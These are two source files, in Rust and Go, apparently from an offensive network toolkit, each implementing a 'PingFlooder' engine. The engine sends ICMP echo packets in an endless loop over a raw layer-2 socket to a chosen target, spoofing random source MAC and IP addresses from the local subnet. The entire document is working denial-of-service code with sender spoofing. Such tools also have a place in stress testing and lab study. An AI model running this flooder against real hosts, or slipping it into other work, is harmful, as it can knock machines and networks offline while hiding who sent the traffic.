File: src/engines/flood_ping/flood_ping.rs
use std::sync::atomic::{ AtomicBool, Ordering };
use std::sync::Arc;
use std::net::Ipv4Addr;
use crate::engines::PingArgs;
use crate::addrs::Mac;
use crate::builders::Packets;
use crate::generators::RandomValues;
use crate::iface::{ Iface, SysInfo };
use crate::sockets::Layer2Socket;
use crate::utils::{ abort, inline_display, get_first_and_last_ip, CtrlCHandler, resolve_mac };



pub struct PingFlooder {
    rand      : RandomValues,
    builder   : Packets,
    iface     : Iface,
    pkts_sent : usize,
    src_ip    : Option<Ipv4Addr>,
    src_mac   : Option<Mac>,
    dst_ip    : Ipv4Addr,
    dst_mac   : Mac,
}


impl PingFlooder {

    pub fn new(args: PingArgs) -> Self {
        let iface = SysInfo::iface_from_ip(args.dst_ip);
        let cidr  = iface.cidr().unwrap_or_else(|e| abort(e));
        
        let (first_ip, last_ip) = get_first_and_last_ip(&cidr);

        Self {
            rand      : RandomValues::new(Some(first_ip), Some(last_ip)),
            builder   : Packets::new(),
            pkts_sent : 0,
            src_ip    : args.src_ip,
            src_mac   : resolve_mac(args.src_mac, &iface),
            dst_ip    : args.dst_ip,
            dst_mac   : resolve_mac(Some(args.dst_mac), &iface).unwrap(),
            iface,
        }
    }

    
    
    pub fn execute(&mut self){
        self.display_exec_info();
        self.send_endlessly();
    }


    
    fn display_exec_info(&self) {
        let src_mac = match self.src_mac {
            Some(mac) => mac.to_string(),
            None      => "Random".to_string(),
        };

        let src_ip = match self.src_ip {
            Some(ip) => ip.to_string(),
            None     => "Random".to_string(),
        };

        let dst_mac = self.dst_mac.to_string();

        println!("SRC >> MAC: {} / IP: {}", src_mac, src_ip);
        println!("DST >> MAC: {} / IP: {}", dst_mac, self.dst_ip);
        println!("IFACE: {}", self.iface.name());
    }



    fn send_endlessly(&mut self) {
        let socket  = Layer2Socket::new(&self.iface);
        let running = Arc::new(AtomicBool::new(true));
        CtrlCHandler::setup(running.clone());

        while running.load(Ordering::SeqCst) {
            let pkt = self.get_packet();
            socket.send(pkt);
            
            self.pkts_sent += 1;
            inline_display(&format!("Packets sent: {}", &self.pkts_sent));
        }
        
        println!("\nFlood interrupted");
    }



    #[inline]
    fn get_packet(&mut self) -> &[u8] {
        self.builder.icmp_ping_ether(
            self.src_mac.unwrap_or_else(|| self.rand.random_mac()),
            self.src_ip.unwrap_or_else( || self.rand.random_ip()),
            self.dst_mac,
            self.dst_ip
        )
    }

}



impl crate::EngineTrait for PingFlooder {
    type Args = PingArgs;
    
    fn new(args: Self::Args) -> Self {
        PingFlooder::new(args)
    }
    
    fn execute(&mut self) {
        self.execute();
    }
}

File: internal/engines/floodping/flood_ping.go
/*
 * Copyright (C) 2025 Oliver R. Calazans Jeronimo
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org>.
 */

package floodping

import (
	"fmt"
	"net"
	"time"

	"offscan/internal/conv"
	"offscan/internal/generators"
	"offscan/internal/ifaceinfo"
	"offscan/internal/packet"
	"offscan/internal/sockets"
	"offscan/internal/sysinfo"
	"offscan/internal/utils"
)



func Run(args []string) {
    New(args).Execute()
}



type PingFlooder struct {
    rand      *generators.RandomValues
    builder   *packet.IcmpPkt
    iface     *net.Interface
    pktsSent   int
    srcIP      net.IP
    srcMAC     net.HardwareAddr
    dstIP      net.IP
    dstMAC     net.HardwareAddr
    duration   float64
}



func New(argList []string) *PingFlooder {
	args   := ParsePingArgs(argList)

	dstIP  := conv.MustStrToIPv4(args.DstIP)
	dstMAC := conv.MustStrToMac(args.DstMAC)

	iface  := sysinfo.MustRouteIfaceForDstIP(dstIP)
    cidr   := ifaceinfo.MustCIDR(iface)
	
	srcIP  := net.ParseIP(args.SrcIP)
	srcMAC := sysinfo.ResolveMac(args.SrcMAC, iface)

    firstIP, lastIP := utils.GetFirstAndLastIP(cidr)

    randGen := generators.NewRandomValues(&firstIP, &lastIP)


    return &PingFlooder{
        rand:      randGen,
        builder:   packet.NewIcmpPkt(),
        iface:     iface,
        srcIP:     srcIP,
        srcMAC:    srcMAC,
        dstIP:     dstIP,
        dstMAC:    dstMAC,
    }
}



func (p *PingFlooder) Execute() {
    p.displayInfo()
    p.sendEndlessly()
    p.displayExecInfo()
}



func (p *PingFlooder) displayInfo() {
    srcMACStr := "Random"
	if p.srcMAC != nil {
        srcMACStr = p.srcMAC.String()
    }

	srcIPStr := "Random"
    if p.srcIP != nil {
        srcIPStr = p.srcIP.String()
    }

    fmt.Printf("[*] SRC >> MAC: %s / IP: %s\n", srcMACStr, srcIPStr)
    fmt.Printf("[*] DST >> MAC: %s / IP: %s\n", p.dstMAC.String(), p.dstIP.String())
    fmt.Printf("[*] IFACE: %s\n", p.iface.Name)
}



func (p *PingFlooder) sendEndlessly() {
    socket := sockets.NewL2Socket(p.iface)
    ctx    := utils.SignalContext()

    fmt.Println("[+] Sending packets. Press CTRL + C to stop")
    start := time.Now()

    for {
        select {
        case <-ctx.Done():
            fmt.Println("\n[-] Flood interrupted")
            p.duration = time.Since(start).Seconds()
            return
        
		default:
            pkt := p.getPacket()
            socket.Send(pkt)
            p.pktsSent++
        }
    }
}



func (p *PingFlooder) getPacket() []byte {
    srcMAC := p.srcMAC
	if srcMAC == nil {
        srcMAC = p.rand.RandomMac()
    }

	srcIP := p.srcIP
    if srcIP == nil {
        srcIP = p.rand.RandomIP()
    }

	return p.builder.L2Pkt(srcMAC, srcIP, p.dstMAC, p.dstIP)
}



func (p *PingFlooder) displayExecInfo() {
    fmt.Printf("[%%] %d packets sent in %.2f seconds\n", p.pktsSent, p.duration)
    
	if p.duration > 1.0 {
        rate := float64(p.pktsSent) / p.duration
        fmt.Printf("[%%] %.2f packets sent per second\n", rate)
    }
}